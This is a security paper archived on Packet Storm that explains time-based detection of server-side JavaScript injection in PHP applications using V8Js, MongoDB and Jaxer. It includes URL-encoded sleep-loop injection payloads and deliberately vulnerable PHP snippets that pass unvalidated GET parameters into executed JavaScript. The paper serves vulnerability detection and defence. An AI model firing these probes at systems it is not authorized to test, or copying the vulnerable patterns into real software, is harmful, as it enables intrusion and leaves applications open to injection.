exploit the possibilities

Google V8 Server-Side Javascript Injection

Google V8 Server-Side Javascript Injection
Posted Feb 27, 2012
Authored by Felipe Daragon | Site syhunt.com

This is a brief write up discussing Google V8 server-side javascript (SSJS) injection.

tags | paper, javascript
MD5 | 527af13953c1ae84cb4320287a31dcd6

Google V8 Server-Side Javascript Injection

Change Mirror Download
Google V8 Server-Side JavaScript Injection joins the set of web 
application security vulnerabilities

TIME-BASED PHP V8JS INJECTION & NOSQL/SSJS INJECTION

Detecting server-side JavaScript (SSJS) injection vulnerabilities using
time-based techniques. Article by Felipe Aragon - February 25, 2012

This article, which is an update of an article that we originally
published on December 18, 2011, intends to highlight the risk of
unvalidated input used to execute server-side JavaScript.

As you read this, web developers are starting to learn how to use V8Js
(Google's V8 JavaScript engine) in PHP:
http://www.php.net/manual/en/v8js.examples.php
http://stackoverflow.com/questions/9035567/why-is-a-function-re-definition-faster-than-calling-the-first-one

...or MongoDB, which is a scalable, high-performance, open source NoSQL
database that also allows JavaScript to be used in queries:
http://www.mongodb.org/

Today, the most common source of PHP security flaws is unvalidated
input. They give rise to SQL Injection, XSS, Remote Command Execution,
Local and Remote File Inclusion, etc (known as the PHP Top 5
https://www.owasp.org/index.php/PHP_Top_5). With the rising adoption of
server-side JavaScript, we can expect server-side JS injection
vulnerabilities caused by unvalidated user input to become prevalent,
and the techniques for exploiting them, commonplace. At Syhunt, we
already started our own collection of techniques for detecting
server-side JS injection vulnerabilities. We want to proactively detect
them before they are exploited.

The Time-Based JS Injection Technique
**********************************************

Injecting a custom sleep code is a technique that may be used to spot
injection vulnerabilities in web applications using server-side
JavaScript execution. This works with any web system that supports
server-side JavaScript execution, such as JavaScript web application
frameworks and servers like Jaxer (http://jaxer.org/), or PHP with V8Js,
or NoSQL engines like MongoDB.

Below you can find examples of server-side JavaScript injection
vulnerabilities in PHP that could be spotted using the sleep technique.
In the past, we used this same sleep code in the client-side to
demonstrate how vulnerabilities we found in the A-A-S (Application
Access Server) could be exploited
(http://www.syhunt.com/?n=Advisories.Aas-multiple).

Example 1: PHP V8JS Injection Vulnerabilities (PHP + V8Js)
*************

The following requests would make these (or similar) vulnerable web
applications sleep for 10 seconds:

vulnerable.php?msg=a';d%20=%20new%20Date();do{cd=new%20Date();}while(cd-d<10000);foo='bar


Vulnerable Code:

$msg = $_GET['msg'];
$v8 = new V8Js();
$v8->executeString("var msg = '$msg'; ..SOME CODE..");


vulnerable.php?msg=version());d%20=%20new%20Date();do{cd=new%20Date();}while(cd-d<10000);foo=('bar'


Vulnerable Code:

$msg = $_GET['msg'];
$v8 = new V8Js();
$JS = <<< EOT
len = print($msg + "\\n");
..SOME CODE..
EOT;

$v8->executeString($JS, 'basic.js');

Example 2: NoSQL SSJS Injection Vulnerability (PHP + MongoDB)
*************

The MongoDB shell provides a sleep() function (see
http://api.mongodb.org/js/current/symbols/src/shell_utils.js.html) which
makes time-based detection much easier to perform.

The following requests would make these (or similar) vulnerable web
applications sleep for 10 seconds:

vulnerable.php?msg=1';sleep(10000);var%20foo='bar

The MongoDB sleep() function works with milliseconds.

Alternative technique using a custom sleep code:

vulnerable.php?msg=1';d=new%20Date();do{cd=new%20Date();}while(cd-d<10000);foo='bar


Vulnerable Code:

<?
$mongo = new Mongo();
$db = $mongo->demo;
$id = $_GET['id'];
$js = "function() {
var id = '$id';
SOME CODE...
}";
$response = $db->execute($js);
...
?>

Example 3: NoSQL SSJS Injection Vulnerability (PHP + MongoDB)
*************

Vulnerable Code:

<?
$mongo = new Mongo();
$db = $mongo->demo;
$year = $_GET['year'];
$collection = $db->demo;
$query = 'function() {var search_year = \'' .
$year . '\';' .
'return this.publicationYear == search_year || ' .
' this.filmingYear == search_year || ' .
' this.recordingYear == search_year;}';
$cursor = $collection->find(array('$where' => $query));
...
?>


Example 4: SSJS Injection Vulnerability (PHP + Jaxer)
*************

Example of a vulnerable application built using the Jaxer Ajax server
and PHP.

Vulnerable Code:

<?php
$myVar = $_GET['id'];

echo "<script runat=server>
myPHPVar = '$myVar';
onload = function(){
..SOME CODE..
};
</script>";
?>


Example 5: Sleep in JavaScript
*************

var date = new Date();
do { curDate = new Date(); }
while(curDate-date < 10000); // delay time (ms)

Additional Information

The advent of Big Data and Cloud Computing is driving adoption of NoSQL
in the enterprise. Because of this, NoSQL-related vulnerabilities are
expected to become much more widespread
(http://www.govtech.com/policy-management/9-Cybersecurity-Threat-Predictions-for-2012.html)

In July last year, Bryan Sullivan, a senior security researcher at Adobe
Systems, demonstrated server-side JavaScript injection vulnerabilities
in web applications using MongoDB and other NoSQL database engines. He
demonstrated how they could be used to perform Denial of Service, File
System, Remote Command Execution, and many other attacks, including the
easy extraction of the entire contents of the NoSQL database -- a blind
NoSQL injection attack (paper available at
https://media.blackhat.com/bh-us-11/Sullivan/BH_US_11_Sullivan_Server_Side_WP.pdf).

Solution

Always validate user input used in server-side JavaScript commands.

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

June 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    1 Files
  • 2
    Jun 2nd
    2 Files
  • 3
    Jun 3rd
    19 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    15 Files
  • 6
    Jun 6th
    12 Files
  • 7
    Jun 7th
    11 Files
  • 8
    Jun 8th
    1 Files
  • 9
    Jun 9th
    1 Files
  • 10
    Jun 10th
    15 Files
  • 11
    Jun 11th
    15 Files
  • 12
    Jun 12th
    15 Files
  • 13
    Jun 13th
    8 Files
  • 14
    Jun 14th
    16 Files
  • 15
    Jun 15th
    2 Files
  • 16
    Jun 16th
    1 Files
  • 17
    Jun 17th
    18 Files
  • 18
    Jun 18th
    15 Files
  • 19
    Jun 19th
    22 Files
  • 20
    Jun 20th
    15 Files
  • 21
    Jun 21st
    15 Files
  • 22
    Jun 22nd
    2 Files
  • 23
    Jun 23rd
    1 Files
  • 24
    Jun 24th
    23 Files
  • 25
    Jun 25th
    19 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close